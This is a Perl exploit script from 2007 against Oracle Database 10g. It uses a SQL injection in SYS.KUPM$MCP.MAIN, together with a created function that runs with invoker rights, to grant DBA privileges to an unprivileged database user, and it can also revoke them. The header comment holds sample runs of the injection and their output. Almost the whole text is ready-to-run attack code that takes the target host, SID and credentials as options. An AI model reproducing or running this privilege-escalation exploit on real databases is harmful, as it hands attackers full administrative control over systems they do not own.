`#!/usr/bin/perl
#
# Remote Oracle KUPM$MCP.MAIN exploit (10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
#
# REF: http://www.red-database-security.com/
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.
# [-] Done!
#
# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g
# [-] Wait...
# [-] Creating evil function...
# [-] Go ...(don't worry about errors)!
# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
# BEGIN
# SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');
# END;"] at kupm-mcpmain.pl line 119.
# [-] YOU GOT THE POWAH!!
#
# bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
# [-] Wait...
# [-] Revoking DBA from BUNKER...
# [-] Done!
#
use warnings;
use strict;
use DBI;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print <<"USAGE";
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]
Options:
-h <host> target server address
-s <sid> target sid name
-u <user> user
-p <passwd> password
-g|-r (g)rant dba to user | (r)evoke dba from user
[-P <port> Oracle port]
USAGE
exit 0
}
my $opt_string = 'h:s:u:p:grP:';
getopts($opt_string, \%opt) or &usage;
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
&usage if ( !$opt{g} and !$opt{r} );
my $user = uc $opt{u};
my $dbh = undef;
if ($opt{P}) {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
} else {
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
}
my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
print "[-] Wait...\n";
if ($opt{r}) {
print "[-] Revoking DBA from $user...\n";
$sqlcmd = "REVOKE DBA FROM $user";
$dbh->do( $sqlcmd );
print "[-] Done!\n";
$dbh->disconnect;
exit;
}
print "[-] Creating evil function...\n";
$dbh->do( qq{
CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
RETURN(0);
END;
} );
print "[-] Go ...(don't worry about errors)!\n";
my $sth = $dbh->prepare( qq{
BEGIN
SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--','');
END;});
$sth->execute;
$sth->finish;
print "[-] YOU GOT THE POWAH!!\n";
$dbh->disconnect;
exit;
`
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